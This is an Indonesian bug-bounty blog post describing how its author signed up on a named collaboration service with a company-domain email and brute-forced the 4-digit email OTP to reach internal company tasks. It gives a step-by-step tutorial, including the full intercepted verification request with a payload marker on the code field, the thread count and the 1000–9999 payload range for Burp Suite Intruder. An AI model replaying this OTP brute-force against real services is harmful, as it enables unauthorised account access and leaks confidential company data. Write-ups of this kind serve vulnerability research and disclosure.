Exploitasi Bypass Register Lead to Internal Company Sensitive Information Disclosure



Bug Sensitive Information adalah kerentanan dimana berdampak pada kebocoran informasi yang bersifat rahasia dimana tidak sembarang orang boleh mengaksesnya atau mendapatkannya. Jika kalian sering melihat postingan dari fanspage nakanosec kalian pasti pernah melihat salah satu postingan mimin tentang bug bounty tips dimana ketika anda mendapatkan regiter form kalian coba mendaftar akun dengan email berdomain milik situs yang kita pentest. Hal ini bukan cuma bohong belaka, banyak kasus dimana kalian mendapatkan informasi sensitif bahkan role admin saat kalian menggunakan company email. Sebelumnya maaf pada tulisan ini ga bakalan banyak penjelasan karna admin sendiri lagi banyak kesibukan, kalian bisa langsung tutorial yang saya berikan. jika ada pertanyaan silahkan tanya ke fanspage nakanosec.

Reconnaissance

  • Intinya gw coba coba fitur yang ada di situsnya dan gw dapetin kesimpulang kayak gini:
  • Situs ini adalah situs semacam slack yaitu situs buat memudahkan komunitas buat membagi tasknya kepada member" yang lain
  • Dalam sebuah komunitas harus ada satu admin yang nantinya melakukan invit kepada member membernya
  • Verifikasi email menggunakan otp 4 digit
Exploitasi

1.Go to https://shortcut.com/signup

2.Enter some company emails (ex:[email protected])

3.Click on “get started for free button”

4.You will see Request otp form like this

5.Open Burp Suite tools and Intercept request

POST /api/private/signups/verify HTTP/1.1
Host: api.app.shortcut.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://shortcut.com/
Content-Type: application/json;charset=utf-8
Content-Length: 61
Origin: https://shortcut.com
Connection: close
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
{"email":"[email protected]","verification_code":"§1000§"}


6.Go on Options Tab and use 50 Threads (Lower is better)

7.Go to Payloads and sets payload as a number start from 1000 to 9999
(ini btw tips dari gw misal ada 4 atau 5 digit otp kalian gaperlu start from 00001 biasanya web itu mulai generate otp mulai dari 1000)

8.Click Start Attack
9.The Otp code show in request with respond code 201

Setelah saya mendapatkan kode otp saya hanya perlu login pada akun tersebut dan saya mampu melihat internal company task. sayangnya pada saat perburuan saya admin pada situs tersebut tidak respondsif dan dengan sepihak mengganti laman respondsible disclosure menjadi no bounty jadi buat kalian jangan ngebounty di situs ini. Btw tulisan ini udah dapet izin adminnya kok.








Catatan: Hanya anggota dari blog ini yang dapat mengirim komentar.